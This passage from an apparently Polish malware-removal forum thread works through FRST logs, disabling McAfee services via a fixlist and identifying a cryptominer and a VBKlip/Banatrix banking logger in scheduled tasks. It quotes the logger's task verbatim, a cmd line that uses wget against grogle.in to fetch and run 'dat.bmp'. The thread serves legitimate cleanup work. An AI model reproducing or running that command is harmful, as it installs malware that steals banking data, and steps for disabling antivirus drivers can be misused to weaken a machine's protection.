2015-08-10] (McAfee, Inc.) R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [495856 2015-08-10] (McAfee, Inc.) R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [839376 2015-08-10] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.) Ale w FRST Addition nie ma żadnych zmian. Przypuszczalnie McAfee zablokował zmiany. W związku z powyższym spróbuj usługi + sterowniki McAfee wyłączyć z poziomu środowiska zewnętrznego RE, a dopiero po tym ponowić operację deinstalacji. Czyli: 1. Otwórz Notatnik i wklej: DisableService: cfwids DisableService: HomeNetSvc DisableService: McAPExe DisableService: mcpltsvc DisableService: McProxy DisableService: mfeaack DisableService: mfeavfk DisableService: mfefirek DisableService: mfehidk DisableService: mfemms DisableService: mfewfpk Plik zapisz pod nazwą fixlist.txt. Plik ten musi być tam skąd będzie uruchamiany FRST w punkcie 2. 2. F8 > Napraw komputer > Wiersz polecenia > uruchom FRST zgodnie ze wskazówkami: KLIK. Klik w Napraw (Fix). Tam skąd był uruchamiany FRST powstanie fixlog.txt. 3. Restart z powrotem do Windows i powtarzasz to wszystko: + pokaż też fixlog.txt.

W systemie była aktywna infekcja w Harmonogramie zadań, pominięta w pierwotnych instrukcjach. Konkretnie BitCoinMiner (wpis MdmUpdateTaskMachineCore) oraz VBKlip/Banatrix (logger): Task: {5E3A314B-DAC0-417E-9379-C49049DA4729} - System32\Tasks\MdmUpdateTaskMachineCore => C:\Users\Timi\AppData\Roaming\uTorrent\Caches\mdm [2015-05-10] ( ) Task: {B3CB3E0B-E2CB-407C-AFDB-17C76C4DD8E7} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=VrNyEGncEc;ALLPlayer_Premium_5.6.2_Setup.exe;1426426470 & start cmd /R dat.bmp Upłynęło dużo czasu. Jeśli nadal problem aktualny, dostarcz świeże raporty FRST, wliczając Addition.